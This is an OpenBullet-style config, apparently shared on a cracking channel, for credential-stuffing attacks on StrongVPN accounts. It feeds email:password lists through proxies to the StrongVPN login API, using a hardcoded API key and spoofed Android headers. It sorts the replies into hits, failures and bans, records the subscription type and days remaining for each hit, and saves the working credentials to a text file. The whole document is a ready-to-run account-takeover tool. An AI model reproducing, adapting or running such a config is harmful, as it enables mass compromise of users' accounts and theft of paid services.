[SETTINGS]
{
  "Name": "StrongVPN",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2020-11-17T04:44:02.4260752-08:00",
  "AdditionalInfo": "Telegram Channel : T.me/ghoulblack",
  "RequiredPlugins": [],
  "Author": "👑LilTOBA👑",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
var guid = uuidv4();
END SCRIPT -> VARS "guid"

#GUID FUNCTION ToUppercase "<guid>" -> VAR "KON" 

#POST REQUEST POST "https://api.colomovers.com/wlapi/login" 
  CONTENT "{\"api_key\":\"ZmOLNuJz0VBLh2pS3Ep6v1hv57DOuN4zuI7I4fGr\",\"client\":\"Android-nullbnull\",\"os\":\"22\",\"password\":\"<PASS>\",\"username\":\"<USER>\",\"uuid\":\"<KON>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "X-Client: strongvpn" 
  HEADER "X-Client-Version: 1.2." 
  HEADER "X-Platform: Android" 
  HEADER "X-Platform-Version: 22" 
  HEADER "Content-Length: 197" 
  HEADER "Host: api.colomovers.com" 
  HEADER "Connection: close" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"access_token\"" 
  KEYCHAIN Failure OR 
    KEY "\"Email or password provided is incorrect\"" 
    KEY "\"code\":1100," 
  KEYCHAIN Ban OR 
    KEY "Too many attempts" 

#Expire_Date PARSE "<SOURCE>" JSON "account_type" CreateEmpty=FALSE -> CAP "Expire Date" 

#sub_end_epoch PARSE "<SOURCE>" JSON "sub_end_epoch" -> VAR "SUBT" 

#TimeNow FUNCTION CurrentUnixTime -> VAR "TimeNow" 

#Day FUNCTION Compute "(<SUBT>-<TimeNow>)/86400" -> VAR "KOS" 

#Days_Left FUNCTION Substring "0" "4" "<KOS>" -> CAP "Days Left" 

UTILITY File "StrongVPN.txt" AppendLines "<USER>: <PASS> //\\n =============================" 

